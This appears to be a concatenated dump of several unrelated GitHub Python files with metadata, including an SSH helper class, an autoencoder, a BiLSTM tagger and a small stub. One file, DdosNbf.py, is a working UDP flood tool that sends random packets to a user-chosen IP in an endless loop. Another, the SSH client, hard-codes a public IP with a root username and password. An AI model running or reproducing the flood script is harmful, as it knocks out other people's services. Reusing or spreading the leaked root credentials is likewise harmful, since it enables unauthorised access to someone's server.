    lis.append(new_lis)
print("\n Vectors \n")
print(lis)
#import gensim, logging
#model = gensim.models.Word2Vec(data_list), min_count=1)
# Dead code below: experimental skip-thought / tf-idf classification
# pipelines, disabled by wrapping the whole section in a string literal.
'''#Encoding the complaint data
import skipthoughts
class SkipThoughtsVectorizer(object):
    def __init__(self):
        self.model = skipthoughts.load_model()
        self.encoder = skipthoughts.Encoder(self.model)
    def fit_transform(self, raw_documents, y):
        return self.encoder.encode(raw_documents, verbose=False)
    def fit(self, raw_documents, y=None):
        self.fit_transform(raw_documents, y)
        return self
    def transform(self, raw_documents, copy=True):
        return self.fit_transform(raw_documents, None)
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import TfidfVectorizer
pipeline_skipthought = Pipeline(steps=[('vectorizer', SkipThoughtsVectorizer()),
                                       ('classifier', LogisticRegression())])
pipeline_tfidf = Pipeline(steps=[('vectorizer', TfidfVectorizer(ngram_range=(1, 2))),
                        ('classifier', LogisticRegression())])
feature_union = ('feature_union', FeatureUnion([
        ('skipthought', SkipThoughtsVectorizer()),
        ('tfidf', TfidfVectorizer(ngram_range=(1, 2))),
    ]))
pipeline_both = Pipeline(steps=[feature_union,
                        ('classifier', LogisticRegression())])
# Train and test the models
for train_size in (10,20,30,40,50,60, len(x_train)):
    print(train_size, '--------------------------------------')
    # skipthought
    pipeline_skipthought.fit(x_train[:train_size], classes_train[:train_size])
    print ('skipthought', pipeline_skipthought.score(x_test, y_test))
    # tfidf
    pipeline_tfidf.fit(x_train[:train_size], classes_train[:train_size])
    print('tfidf', pipeline_tfidf.score(x_test, y_test))
    # both
    pipeline_both.fit(tweets_train[:train_size], classes_train[:train_size])
    print('skipthought+tfidf', pipeline_both.score(x_test, y_test))'''
| [
"gaya3vs.0007@gmail.com"
] | gaya3vs.0007@gmail.com |
e653fd731ccd9db6f8d81fadcce9fd4d304d5bff | 8ba2e630323ebcef7be85a4eff4a5487bcb42252 | /repinteractive/InterActiveBase.py | 8328bb4043b449580c9ed799c3bd6eebc79337a8 | [] | no_license | 768001076/python-zouba-usecode | 4245b8ccdbf88e5b3879e6006f4cf0a378498a8a | c75ef921d358082d26ae63b5c3775bcd28f8d0f7 | refs/heads/master | 2020-03-27T02:21:35.169826 | 2018-08-23T01:37:14 | 2018-08-23T01:37:16 | 145,783,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,008 | py | import os
from paramiko.client import AutoAddPolicy
from paramiko.client import SSHClient
# from otherTools import OtherTools
class MySSHClient:
    def __init__(self):
        # Underlying paramiko SSHClient; configured and connected in connect().
        self.ssh_client = SSHClient()
# 连接登录
def connect(self, hostname, port, username, password):
try:
print('正在远程连接主机:%s' % hostname)
self.ssh_client.set_missing_host_key_policy(AutoAddPolicy())
self.ssh_client.connect(hostname=hostname, port=port, username=username, password=password)
return [True, '']
except Exception as e:
print('连接出错了%s' % e)
return [False, '%s' % e]
# 远程执行命令
def exec_command(self, command):
try:
print('正在执行命令:'+ command)
stdin, stdout, stderr = self.ssh_client.exec_command(command)
print('命令输出:')
print(stdout.read()) # 读取命令输出
return [True, tuple]
except Exception as e:
print('执行命:%s令出错' % command)
return [False,'%s' % e]
# 下载文件(非目录文件)
def download_file(self, remotepath, localpath):
try:
localpath = os.path.abspath(localpath)
localpath = localpath.replace('\t', '/t').replace('\n', '/n').replace('\r', '/r').replace('\b', '/b') # 转换特殊字符
localpath = localpath.replace('\f', '/f')
print('转换后的本地目标路径为:%s' % localpath)
head, tail = os.path.split(localpath)
if not tail:
print('下载文件:%s 到本地:%s失败,本地文件名不能为空' % (remotepath, localpath))
return [False, '下载文件:%s 到本地:%s失败,本地文件名不能为空' % (remotepath, localpath)]
if not os.path.exists(head):
print('本地路径:%s不存在,正在创建目录' % head)
# OtherTools().mkdirs_once_many(head)
sftp_client = self.ssh_client.open_sftp()
print('正在下载远程文件:%s 到本地:%s' % (remotepath, localpath))
sftp_client.get(remotepath, localpath)
sftp_client.close()
return [True, '']
except Exception as e:
print('下载文件:%s 到本地:%s 出错:%s' % (remotepath, localpath, e))
return [False, '下载文件:%s 到本地:%s 出错:%s' % (remotepath, localpath, e)]
# 上传文件(非目录文件)
def upload_file(self, localpath, remotepath):
try:
localpath = localpath.rstrip('\\').rstrip('/')
localpath = localpath.replace('\t', '/t').replace('\n', '/n').replace('\r', '/r').replace('\b', '/b') # 转换特殊字符
localpath = localpath.replace('\f', '/f')
localpath = os.path.abspath(localpath)
print('转换后的本地文件路径为:%s' % localpath)
remotepath = remotepath.rstrip('\\').rstrip('/')
head, tail = os.path.split(localpath)
if not tail:
print('上传文件:%s 到远程:%s失败,本地文件名不能为空' % (localpath, remotepath))
return [False, '上传文件:%s 到远程:%s失败,本地文件名不能为空' % (localpath, remotepath)]
if not os.path.exists(head):
print( '上传文件:%s 到远程:%s失败,父路径不存在' % (localpath, remotepath, head))
return [False, '上传文件:%s 到远程:%s失败,父路径不存在' % (localpath, remotepath, head)]
if not (remotepath.startswith('/') or remotepath.startswith('.')):
print('上传文件:%s 到远程:%s失败,远程路径填写不规范%s' % (localpath, remotepath,remotepath))
return [False, '上传文件:%s 到远程:%s失败,远程路径填写不规范%s' % (localpath, remotepath,remotepath)]
sftp_client = self.ssh_client.open_sftp()
head, tail = os.path.split(remotepath)
head = sftp_client.normalize(head) # 规范化路径
remotepath = head + '/' + tail
print('规范化后的远程目标路径:', remotepath)
print('正在上传文件:%s 到远程:%s' % (localpath, remotepath))
sftp_client.put(localpath, remotepath)
sftp_client.close()
return [True, '']
except Exception as e:
print('上传文件:%s 到远程:%s 出错:%s' % (localpath, remotepath, e))
return [False, '上传文件:%s 到远程:%s 出错:%s' % (localpath, remotepath, e)]
def close(self):
self.ssh_client.close()
if __name__ == '__main__':
    # Interactive REPL: connect once, then forward each typed command.
    # SECURITY NOTE(review): host, user and password are hard-coded in plain
    # text (root credentials!) -- move them to env vars or a config file.
    client = MySSHClient()
    client.connect('39.105.161.244',22,'root','Aisjl953923')
    while True:
        # NOTE(review): input(str) passes the *type* str as the prompt, so
        # "<class 'str'>" is printed before each command -- likely unintended.
        command = input(str)
        print(command)
        client.exec_command(command)
"shijialei"
] | shijialei |
6e22b9181e9dcec7bac28112f25850dd293ce55f | cfca6d26ffc4a2a968a3c851dcd1e78669080789 | /DdosNbf.py | 7b37129867db145dc528128ab83893225373fc61 | [] | no_license | NBFNusantaraBlackHat/DDoS-Attack | 18371b2b0d04713d97a21ab801b8fec97ace83ad | 3f748a9dc06de12d4e205deb05a971c7d07c5cb8 | refs/heads/master | 2020-04-08T07:48:24.629008 | 2018-11-26T10:47:39 | 2018-11-26T10:47:39 | 159,152,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
os.system("figlet By: NBF")
print
print "Author : NBF(NusantaraBlackHat)"
print "You Tube : GAK PUNYA CHANEL YOUTUBE NGENTOD"
print "github : https://github.com/NBFNusantaraBlackHat"
print "Facebook : https://www.facebook.com/Cari Sampe Ketemu"
print
ip = raw_input("IP Target : ")
port = input("Port : ")
os.system("clear")
os.system("figlet Attack Starting")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1 | [
"noreply@github.com"
] | noreply@github.com |
6bcfdaa018b7e760ee67c1fe72ae9bf3302e7b12 | f6120ec98e4df5a5de7c1dec9105c3c382c5579e | /other/tbdaspro v0.5/package/addwahana.py | 4918099ae472bd3b50e2d694944d1013dd8d4741 | [] | no_license | Lock1/IF1210-Daspro | 3b63207b74e27bb6442992454b179604db969f1c | 289efc5ea7b58bcc7253a6fcec6e34ebd294630d | refs/heads/master | 2023-03-25T08:18:47.824967 | 2020-10-16T16:25:30 | 2020-10-16T16:25:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 815 | py | # add wahana
# pre defined xinput() and update()
def addWahana():
    """Interactively collect the attributes of a new ride (wahana).

    Relies on the externally defined xinput() helper for reading input.
    The collected values are not persisted yet: the call to update() is
    still commented out, as in the original stub.
    """
    # no restriction, filter admin / non admin at main loop
    # Meminta input user (prompt the user for each field)
    print("Masukkan Informasi Wahana yang ditambahkan:")
    print("Masukkan ID Wahana: ", end="")
    newID = xinput()
    print() # newline
    print("Masukkan Nama Wahana: ", end="")
    # BUG FIX: the value was read into 'newName' while the variable was
    # pre-initialised as 'newname' (case mismatch); the dead "" / 0
    # pre-initialisations have been removed along with the inconsistency.
    newName = xinput()
    print()
    print("Masukkan Harga Tiket: ", end="")
    newcost = xinput()
    print()
    print("Batasan umur: ", end="")
    newage = xinput()
    print()
    print("Batasan tinggi badan: ", end="")
    newheight = xinput()
    print("\n")
    print("Info wahana telah ditambahkan!")
    # update
    # call update()
    # end of function
| [
"tanurrizaldi@gmail.com"
] | tanurrizaldi@gmail.com |
b9c65a3475c55af3ee73b29aea7de9b7bd2db0bd | 01ad98b8bc78f894b3fb0fd7342a7588ca4089af | /DAE-SSIM-test.py | 52cae6e80d168f83dbe7e6f64bb0a819025585b8 | [] | no_license | terrytykuo/cocktail | ed526e3ba320319ecd70556d5bea2bbada870a80 | e24f8e121184749b7e7de31c18f706dffc816748 | refs/heads/master | 2022-11-04T20:17:13.424020 | 2019-02-10T11:56:47 | 2019-02-10T11:56:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,900 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
import torch.utils.data as data
import torch.nn.init as init
import pytorch_ssim
import torchvision
import torchvision.transforms as transforms
from torch.autograd import Variable
import matplotlib.pyplot as plt
import pickle
import os
import json
import numpy as np
import gc
import cv2
epoch = 5  # number of passes over the data in the evaluation loop below
bs = 10    # batch size; also hard-coded into the model's view() calls
#=============================================
# Define Functions
#=============================================
def odd(w):
    """Return the odd indices [1, 3, 5, ...] strictly below *w* as a list.

    Used to address interleaved rows/columns when expanding tensors.
    FIX: a plain range() replaces np.arange(..., dtype='long'); the 'long'
    dtype string maps to the platform C long (32-bit on Windows) and numpy
    scalars are unnecessary for index lists.
    """
    return list(range(1, w, 2))
def even(w):
    """Return the even indices [0, 2, 4, ...] strictly below *w* as a list.

    Counterpart of odd(); see that function for why plain range() replaces
    np.arange(..., dtype='long').
    """
    return list(range(0, w, 2))
def white(x):
    """Build additive noise shaped like one (freq, time) spectrogram.

    Combines fine-grained positive noise ("first") with coarser noise drawn
    at half resolution and nearest-neighbour-expanded to full size
    ("second").  NOTE(review): assumes x is 3-D (uses x.shape[1]/x.shape[2])
    and that both dimensions are even -- confirm with the dataloader.
    """
    fw, tw = x.shape[1], x.shape[2]
    # Per-bin rectified Gaussian noise, small amplitude.
    first = F.relu(torch.normal(mean=torch.zeros(fw, tw), std=torch.ones(fw, tw)) ) * 0.05
    second_seed = F.relu(torch.normal(mean=torch.zeros(fw//2, tw//2), std=torch.ones(fw//2, tw//2))) * 0.03
    second = torch.zeros(fw, tw)
    row_x = torch.zeros(int(fw//2), tw)
    # row_x = torch.zeros(int(fw/2), tw)
    # Duplicate each half-resolution value into adjacent columns, then rows.
    row_x[:, odd(tw)] = second_seed
    row_x[:, even(tw)] = second_seed
    second[odd(fw), :] = row_x
    second[even(fw), :] = row_x
    return second + first
#=============================================
# path
#=============================================
server = False  # toggle between local and server data locations
root_dir = '/home/tk/Documents/'
if server == True:
    root_dir = '/home/guotingyou/cocktail_phase2/'
clean_dir = root_dir + 'clean/'
# mix_dir = root_dir + 'mix/'
# clean_label_dir = root_dir + 'clean_labels/'
# mix_label_dir = root_dir + 'mix_labels/'
# NOTE(review): os.listdir runs at import time and raises if the directory
# is missing; the sorted listing is never used later in this script.
cleanfolder = os.listdir(clean_dir)
cleanfolder.sort()
# mixfolder = os.listdir(mix_dir)
# mixfolder.sort()
clean_list = []  # module-level accumulator filled by MSourceDataSet
# mix_list = []
#=============================================
# Define Datasets
#=============================================
class MSourceDataSet(Dataset):
    """Dataset of clean spectrogram frames loaded from a single JSON file."""
    def __init__(self, clean_dir):
        # Overfitting single block
        # NOTE(review): appends into the module-global clean_list, so
        # instantiating this class twice would duplicate the data.
        with open(clean_dir + 'clean12.json') as f:
            clean_list.append(torch.Tensor(json.load(f)))
        cleanblock = torch.cat(clean_list, 0)
        # mixblock = torch.cat(mix_list, 0)
        self.spec = cleanblock
    def __len__(self):
        # Number of individual spectrogram frames.
        return self.spec.shape[0]
    def __getitem__(self, index):
        spec = self.spec[index]
        return spec
#=============================================
# Define Dataloader
#=============================================
testset = MSourceDataSet(clean_dir)
# Shuffled batches of size bs (drop_last is False, so the final batch may be
# smaller than bs -- the model's hard-coded view(bs, ...) assumes it is not).
trainloader = torch.utils.data.DataLoader(dataset = testset,
                                          batch_size = bs,
                                          shuffle = True)
#=============================================
# Model
#=============================================
''' ResBlock '''
class ResBlock(nn.Module):
    """3x3-conv residual block that can also adapt the channel count.

    Growing (out > in): the skip path is zero-padded with extra channels.
    Shrinking (out < in): the first conv forms the new trunk and the second
    conv supplies the residual.  Equal: a plain two-conv residual block.
    """
    def __init__(self, channels_in, channels_out):
        super(ResBlock, self).__init__()
        self.channels_in = channels_in
        self.channels_out = channels_out
        self.conv1 = nn.Conv2d(in_channels=channels_in, out_channels=channels_out, kernel_size=(3,3), padding=1)
        self.conv2 = nn.Conv2d(in_channels=channels_out, out_channels=channels_out, kernel_size=(3,3), padding=1)

    def forward(self, x):
        cin, cout = self.channels_in, self.channels_out
        if cout > cin:
            branch = self.conv2(F.relu(self.conv1(x)))
            skip = self.sizematch(cin, cout, x)
            return F.relu(skip + branch)
        if cout < cin:
            trunk = F.relu(self.conv1(x))
            return F.relu(trunk + self.conv2(trunk))
        branch = self.conv2(F.relu(self.conv1(x)))
        return F.relu(x + branch)

    def sizematch(self, channels_in, channels_out, x):
        # Pad the skip connection with zero-valued channels so it can be
        # added to the wider branch output.
        pad_shape = (x.size()[0], channels_out - channels_in, x.shape[2], x.shape[3])
        padding = torch.zeros(pad_shape, dtype=torch.float32)
        return torch.cat((x, padding), dim=1)
class ResTranspose(nn.Module):
    """Residual 2x spatial upsampler (expects channels_in == channels_out).

    Learned path: stride-2 transposed conv followed by a 3x3 conv.  Skip
    path: nearest-neighbour expansion built by writing the input into both
    the odd and the even rows/columns of a doubled grid.
    """
    def __init__(self, channels_in, channels_out):
        super(ResTranspose, self).__init__()
        self.channels_in = channels_in
        self.channels_out = channels_out
        self.deconv1 = nn.ConvTranspose2d(in_channels=channels_in, out_channels=channels_out, kernel_size=(2,2), stride=2)
        self.deconv2 = nn.Conv2d(in_channels=channels_out, out_channels=channels_out, kernel_size=(3,3), padding=1)

    def forward(self, x):
        # cin = cout
        learned = self.deconv2(F.relu(self.deconv1(x)))
        skip = self.sizematch(x)
        return F.relu(skip + learned)

    def sizematch(self, x):
        # Nearest-neighbour 2x expansion: first widen columns, then rows.
        batch, height, width = x.shape[0], x.shape[2], x.shape[3]
        widened = torch.zeros(batch, self.channels_in, height, 2 * width)
        widened[:, :, :, odd(2 * width)] = x
        widened[:, :, :, even(2 * width)] = x
        doubled = torch.zeros(batch, self.channels_in, 2 * height, 2 * width)
        doubled[:, :, odd(2 * height), :] = widened
        doubled[:, :, even(2 * height), :] = widened
        return doubled
def initialize(m):
    """Xavier-initialise conv weights and zero conv biases.

    Intended to be passed to nn.Module.apply(), which calls it once per
    submodule.  Non-conv modules are left untouched.
    """
    if isinstance(m, nn.Conv2d):
        init.xavier_normal_(m.weight)
        # FIX: guard against bias=False convolutions, where m.bias is None
        # and init.constant_ would raise.
        if m.bias is not None:
            init.constant_(m.bias, 0)
    if isinstance(m, nn.ConvTranspose2d):
        init.xavier_normal_(m.weight)
class ResDAE(nn.Module):
    """Residual denoising autoencoder over spectrogram images.

    upward() encodes the input through seven conv stages into a 512-d code
    (fc1) while caching intermediate activations (x2..x5) for U-Net-style
    shortcuts; downward() decodes the code back (fc2) through mirrored
    upsampling stages, optionally concatenating the cached activations.
    NOTE(review): the shape comments below say 128x128, but upward() views
    the input as (bs, 1, 256, 128) -- confirm which is current.
    """
    def __init__(self):
        super(ResDAE, self).__init__()
        # 128x128x1
        self.upward_net1 = nn.Sequential(
            ResBlock(1, 8),
            ResBlock(8, 8),
            ResBlock(8, 8),
            nn.BatchNorm2d(8),
        )
        # 64x64x8
        self.upward_net2 = nn.Sequential(
            nn.Conv2d(in_channels=8, out_channels=8, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(8, 8),
            ResBlock(8, 16),
            ResBlock(16, 16),
            nn.BatchNorm2d(16),
        )
        # 32x32x16
        self.upward_net3 = nn.Sequential(
            nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(16, 16),
            ResBlock(16, 32),
            ResBlock(32, 32),
            nn.BatchNorm2d(32),
        )
        # 16x16x32
        self.upward_net4 = nn.Sequential(
            nn.Conv2d(in_channels=32, out_channels=32, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(32, 32),
            ResBlock(32, 64),
            ResBlock(64, 64),
            nn.BatchNorm2d(64),
        )
        # 8x8x64
        self.upward_net5 = nn.Sequential(
            nn.Conv2d(in_channels=64, out_channels=64, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(64, 64),
            ResBlock(64, 128),
            ResBlock(128, 128),
            nn.BatchNorm2d(128),
        )
        # 4x4x128
        self.upward_net6 = nn.Sequential(
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(128, 128),
            ResBlock(128, 256),
            ResBlock(256, 256),
            nn.BatchNorm2d(256),
        )
        # 2x2x256
        self.upward_net7 = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(2,2), stride=2),
            nn.ReLU(),
            ResBlock(256, 256),
            ResBlock(256, 512),
            ResBlock(512, 512),
            nn.BatchNorm2d(512),
        )
        # Bottleneck: flatten the deepest feature map into a 512-d code.
        self.fc1 = nn.Linear(4096, 512)
        self.fc2 = nn.Linear(512, 4096)
        # 1x1x512
        self.downward_net7 = nn.Sequential(
            ResBlock(512, 512),
            ResBlock(512, 256),
            ResBlock(256, 256),
            ResTranspose(256, 256),
            # nn.ConvTranspose2d(256, 256, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(256),
        )
        # 2x2x256
        self.downward_net6 = nn.Sequential(
            # 8x8x64
            ResBlock(256, 256),
            ResBlock(256, 128),
            ResBlock(128, 128),
            ResTranspose(128, 128),
            # nn.ConvTranspose2d(128, 128, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(128),
        )
        # 4x4x128
        # cat -> 4x4x256
        self.uconv5 = nn.Conv2d(256, 128, kernel_size=(3,3), padding=(1,1))
        # 4x4x128
        self.downward_net5 = nn.Sequential(
            ResBlock(128, 128),
            ResBlock(128, 64),
            ResBlock(64, 64),
            ResTranspose(64, 64),
            # nn.ConvTranspose2d(64, 64, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(64),
        )
        # 8x8x64
        # cat -> 8x8x128
        self.uconv4 = nn.Conv2d(128, 64, kernel_size=(3,3), padding=(1,1))
        # 8x8x64
        self.downward_net4 = nn.Sequential(
            ResBlock(64, 64),
            ResBlock(64, 32),
            ResBlock(32, 32),
            ResTranspose(32, 32),
            # nn.ConvTranspose2d(32, 32, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(32),
        )
        # 16x16x32
        # cat -> 16x16x64
        self.uconv3 = nn.Conv2d(64, 32, kernel_size=(3,3), padding=(1,1))
        # 16x16x32
        self.downward_net3 = nn.Sequential(
            ResBlock(32, 32),
            ResBlock(32, 16),
            ResBlock(16, 16),
            ResTranspose(16, 16),
            # nn.ConvTranspose2d(16, 16, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(16),
        )
        # 32x32x16
        # cat -> 32x32x32
        self.uconv2 = nn.Conv2d(32, 16, kernel_size=(3,3), padding=(1,1))
        # 32x32x16
        self.downward_net2 = nn.Sequential(
            ResBlock(16, 16),
            ResBlock(16, 8),
            ResBlock(8, 8),
            ResTranspose(8, 8),
            # nn.ConvTranspose2d(8, 8, kernel_size = (2,2), stride = 2),
            nn.BatchNorm2d(8),
        )
        # 64x64x8
        self.downward_net1 = nn.Sequential(
            ResBlock(8, 8),
            ResBlock(8, 4),
            ResBlock(4, 1),
            ResBlock(1, 1),
            nn.BatchNorm2d(1),
        )
        # 128x128x1
        self.apply(initialize)
    def upward(self, x, a7=None, a6=None, a5=None, a4=None, a3=None, a2=None):
        """Encode x into the 512-d code.

        a2..a7 are optional per-stage multiplicative attention masks.
        Side effect: caches self.x2..self.x5 for downward() shortcuts.
        NOTE(review): uses the module-global bs for reshaping, so the last
        (smaller) batch of an epoch would break here.
        """
        x = x.view(bs, 1, 256, 128)
        # 1x128x128
        # print ("initial", x.shape)
        x = self.upward_net1(x)
        # print ("after conv1", x.shape)
        # 8x64x64
        x = self.upward_net2(x)
        if a2 is not None: x = x * a2
        self.x2 = x
        # print ("after conv2", x.shape)
        # 16x32x32
        x = self.upward_net3(x)
        if a3 is not None: x = x * a3
        self.x3 = x
        # print ("after conv3", x.shape)
        # 32x16x16
        x = self.upward_net4(x)
        if a4 is not None: x = x * a4
        self.x4 = x
        # print ("after conv4", x.shape)
        # 64x8x8
        x = self.upward_net5(x)
        if a5 is not None: x = x * a5
        self.x5 = x
        # print ("after conv5", x.shape)
        # 128x4x4
        x = self.upward_net6(x)
        if a6 is not None: x = x * a6
        # print ("after conv6", x.shape)
        # 256x2x2
        x = self.upward_net7(x)
        if a7 is not None: x = x * a7
        # print ("after conv7", x.shape)
        x = x.view(bs, 1, -1)
        x = self.fc1(x)
        return x
    def downward(self, y, shortcut= True):
        """Decode a 512-d code back to a spectrogram image.

        When shortcut is True, the activations cached by the most recent
        upward() call are concatenated U-Net-style at stages 5..2, so
        upward() must have been called first on the same batch.
        """
        # print ("begin to downward, y.shape = ", y.shape)
        y = self.fc2(y)
        y = y.view(bs, 512, 4, 2)
        # 512x2x2
        y = self.downward_net7(y)
        # print ("after down7", y.shape)
        # 256x4x4
        y = self.downward_net6(y)
        # print ("after down6", y.shape)
        # 128x8x8
        if shortcut:
            y = torch.cat((y, self.x5), 1)
            y = F.relu(self.uconv5(y))
        y = self.downward_net5(y)
        # print ("after down5", y.shape)
        # 64x16x16
        if shortcut:
            y = torch.cat((y, self.x4), 1)
            y = F.relu(self.uconv4(y))
        y = self.downward_net4(y)
        # print ("after down4", y.shape)
        # 32x32x32
        if shortcut:
            y = torch.cat((y, self.x3), 1)
            y = F.relu(self.uconv3(y))
        y = self.downward_net3(y)
        # print ("after down3", y.shape)
        # 16x64x64
        if shortcut:
            y = torch.cat((y, self.x2), 1)
            y = F.relu(self.uconv2(y))
        y = self.downward_net2(y)
        # print ("after down2", y.shape)
        # 8x128x128
        y = self.downward_net1(y)
        # print ("after down1", y.shape)
        # 1x128x128
        return y
#model = ResDAE()
# Load a previously trained autoencoder checkpoint (whole pickled module).
# NOTE(review): torch.load of a full module requires the class definitions
# above to be importable under the same names used at save time.
model = torch.load(root_dir + 'recover/SSIM/DAE_SSIM.pkl')
# print (model)
#=============================================
# testing
#=============================================
criterion = pytorch_ssim.SSIM()
model.eval()
# Evaluation loop: corrupt each batch with noise, reconstruct it, and dump
# input/reconstruction image pairs to disk for visual inspection.
for epo in range(epoch):
    for i, data in enumerate(trainloader, 0):
        inputs = data
        inputs = Variable(inputs)
        # Add structured noise before encoding (denoising-autoencoder setup).
        top = model.upward(inputs + white(inputs))
        outputs = model.downward(top, shortcut = True)
        inputs = inputs.view(bs, 1, 256, 128)
        outputs = outputs.view(bs, 1, 256, 128)
        #with open ( root_dir + 'recover/L1loss_FC/recover_pic_epo_' + str(epo), 'w') as f:
        #    json.dump(outputs.tolist(), f)
        # SSIM is a similarity (higher is better); negate it to get a loss.
        loss = - criterion(outputs, inputs)
        ssim_value = - loss.data.item()  # NOTE(review): computed but never used
        if i % 20 == 0:
            # Save the first sample of every 20th batch as 8-bit PNGs.
            inn = inputs[0].view(256, 128).detach().numpy() * 255
            cv2.imwrite("/home/tk/Documents/recover/SSIM_test/" + str(epo) + "_" + str(i) + ".png", inn)
            out = outputs[0].view(256, 128).detach().numpy() * 255
            cv2.imwrite("/home/tk/Documents/recover/SSIM_test/" + str(epo) + "_" + str(i) + "_re.png", out)
| [
"oldiegoodie99@gmail.com"
] | oldiegoodie99@gmail.com |
be5ba2c6a82625b16986607b6b57ba1f589692b2 | 7443274ce4d517ebe5148f47d5495f4653e34c30 | /bilstm.py | 10a573d33dc1e753e71844186cff43aa04bc6fde | [] | no_license | shirayair/Bilstm-Tagger | d7dd5b4a9bdbb7738883f361ccca49d872c61ee1 | d505e7bddf08287ff0038e45e8779a108abb9882 | refs/heads/main | 2023-07-01T04:49:37.040694 | 2021-07-13T14:30:37 | 2021-07-13T14:30:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | import torch
from torch import nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence, pad_sequence
from train_biLSTM import train_and_eval_model
from process_data_3 import process_data
# Hyperparameters shared by the model and the __main__ training entry point.
EMBEDDING_DIM = 50       # size of the learned word vectors
HIDDEN_LAYER_LSTM = 100  # hidden units per LSTM direction
EPOCHS = 5
LR = 0.01
BATCH_SIZE = 500         # training batch size
DEV_BATCH_SIZE = 50      # validation batch size
class BiLSTM(nn.Module):
    """2-layer bidirectional LSTM sequence tagger over padded batches.

    forward() takes lists of variable-length index tensors, pads them, and
    returns per-token tag scores together with the padded gold labels.
    """
    def __init__(self, output_dim, vocab_size):
        super(BiLSTM, self).__init__()
        torch.manual_seed(3)  # fixed seed so parameter init is reproducible
        self.hidden_layer_lstm = HIDDEN_LAYER_LSTM
        self.output_dim = output_dim
        self.embed_dim = EMBEDDING_DIM
        # Index 0 is reserved for padding in both sequences and labels.
        self.seq_pad_idx, self.label_pad_idx = 0, 0
        self.vocab_size = vocab_size
        self.lstm, self.embed, self.mlp = self.build_model()
        nn.init.uniform_(self.embed.weight, -1.0, 1.0)
    def build_model(self):
        """Construct the embedding, LSTM and output layers."""
        # whenever the embedding sees the padding index it'll make the whole vector zeros
        word_embedding = nn.Embedding(
            num_embeddings=self.vocab_size + 1,
            embedding_dim=self.embed_dim,
            padding_idx=self.seq_pad_idx
        )
        # design LSTM
        lstm = nn.LSTM(
            input_size=self.embed_dim,
            hidden_size=self.hidden_layer_lstm,
            bidirectional=True,
            num_layers=2
        )
        # output layer which projects back to tag space
        # NOTE(review): Softmax(dim=1) normalises over the *sequence* axis of
        # the (batch, seq, tags) output -- dim=2 was probably intended; also,
        # CrossEntropyLoss usually expects raw logits rather than softmaxed
        # probabilities.  Confirm against the training code.
        mlp = nn.Sequential(nn.Linear(2 * self.hidden_layer_lstm, self.output_dim),
                            nn.Tanh(), nn.Softmax(dim=1))
        return lstm, word_embedding, mlp
    def forward(self, x, y):
        """Pad, embed and tag a batch; returns (tag_scores, padded_labels)."""
        lens = list(map(len, x))
        x = pad_sequence(x, batch_first=True, padding_value=self.seq_pad_idx)
        y = pad_sequence(y, batch_first=True, padding_value=self.label_pad_idx)
        x = self.embed(x)
        x = pack_padded_sequence(x, lens, batch_first=True, enforce_sorted=False)
        # now run through LSTM
        # NOTE(review): the names (c0, ho) are swapped relative to torch's
        # (h_n, c_n) return order; both are unused here anyway.
        output, (c0, ho) = self.lstm(x)
        # undo the packing operation
        x, lens = pad_packed_sequence(output, batch_first=True)
        Y_hats = self.mlp(x)
        return Y_hats, y
    def save(self, path):
        """Serialise the model parameters to *path*."""
        torch.save(self.state_dict(), path)
    def load(self, path):
        """Restore parameters previously written by save()."""
        state_dict = torch.load(path)
        self.load_state_dict(state_dict)
if __name__ == "__main__":
isPos = True
train_loader, valid_loader, vocab_sample, vocab_label, word_to_idx, labels_to_idx = process_data(isPos, BATCH_SIZE,
DEV_BATCH_SIZE)
if not isPos:
weights = [1.0, 1.0, 0.1, 1.0, 1.0, 1.0]
class_weights = torch.tensor(weights)
loss_func = nn.CrossEntropyLoss(weight=class_weights, ignore_index=labels_to_idx['PAD'], reduction='mean')
else:
loss_func = nn.CrossEntropyLoss(ignore_index=labels_to_idx['PAD'], reduction='mean')
model = BiLSTM(len(labels_to_idx), len(word_to_idx))
model = train_and_eval_model(model, train_loader, valid_loader, loss_func, labels_to_idx, EPOCHS, LR)
| [
"noreply@github.com"
] | noreply@github.com |
4c7546e287b51fcb292b3b1b17e4cab62b4f0e97 | 7c5fa7d9722f59fce5e3336f7c0e9edd084c13be | /WorldBankData.py | b03f0305cfa7d2025d227bc40bc03ce356db4d50 | [] | no_license | ytnvj2/Python-Practice | d8f19e6d76277a6071c56a635de79ba0bd180d13 | 591eccf1421b4a1811a113d94e1b059bb696c50f | refs/heads/master | 2021-09-08T20:39:33.298643 | 2018-03-12T03:50:48 | 2018-03-12T03:50:48 | 124,785,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,433 | py | # Zip lists: zipped_lists
